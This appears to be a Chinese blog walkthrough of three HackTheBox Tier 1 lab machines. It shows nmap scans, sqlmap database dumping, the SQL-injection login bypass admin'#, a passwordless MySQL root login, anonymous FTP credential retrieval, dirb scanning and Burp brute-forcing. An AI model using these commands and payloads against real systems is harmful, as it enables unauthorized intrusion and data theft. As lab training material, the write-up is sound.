玩转HackTheBox靶场(二)

本文我们接着前期文章来学习hackthebox相关的靶场关卡。

TIER0我们在直播过程中已经为大家进行了讲解,本文单独讲解 TIER1的关卡吧。

玩转HackTheBox靶场(二)

Appointment

这关考察的是sql注入相关方面的知识,我们首先对其进行端口扫描。

nmap -T4 -A 10.129.23.47 

玩转HackTheBox靶场(二)如上,我们可以到了只起开了80端口,毫无疑问应该是个web站长。访问IP如下。

玩转HackTheBox靶场(二)既然是存在sql注入,我们在burp中进行抓包,将数据放到sqlmap中进行扫描即可。

玩转HackTheBox靶场(二)将数据包保存为txt文件,然后执行下面命令。

sqlmap -r "22.txt" --dbs

如下,成功得到数据库信息。

玩转HackTheBox靶场(二)表信息

sqlmap -r "22.txt" -D appdb --tables

玩转HackTheBox靶场(二)表字段

sqlmap -r "22.txt" -D appdb -T users --columns
玩转HackTheBox靶场(二)

当然,除了sqlmap跑之外还有更简单的方法,我们利用万能账号直接登录就行了。如admin'#

玩转HackTheBox靶场(二)

Sequle

同样,我们还是选对设备进行端口扫描。

nmap -sC -sV 10.129.95.232

我们可以看到,目标开启了3306mysql端口。

玩转HackTheBox靶场(二)对于既然目标来气了mysql相关端口,我们可以尝试暴力破解或者匿名登录。执行下面命令

mysql -h 10.129.95.232 -u root -p

回车后,发现可以直接登录。

show databases; #显示数据库
use htb; #选择数据库
show tables; #显示表
select * from config; #查询表

如下,成功得到flag

玩转HackTheBox靶场(二)

Crocodile

同样,启动靶场后我们对目标进行端口扫描。

nmap -sC -sV 10.129.104.219

玩转HackTheBox靶场(二)如下,目标开启了21 80端口。并且21端口可以匿名登录。我们首先登录ftp来看看。

玩转HackTheBox靶场(二)下载文件

get allowed.userlist # 用户列表
get allowed.userlist.passwd # 密码列表

打开两个文件,疑似存放了账号和密码。我们访问80端口。

玩转HackTheBox靶场(二)利用后台扫描工具扫描站点后台地址

dirb http://10.129.104.219 -w  /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php

玩转HackTheBox靶场(二)用下载后的账号和密码进行登录,这里我用burp抓包后,进行枚举破解。

玩转HackTheBox靶场(二)成功得到flag

玩转HackTheBox靶场(二)

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):玩转HackTheBox靶场(二)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之家整理,本文链接:https://www.bmabk.com/index.php/post/152223.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之家——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!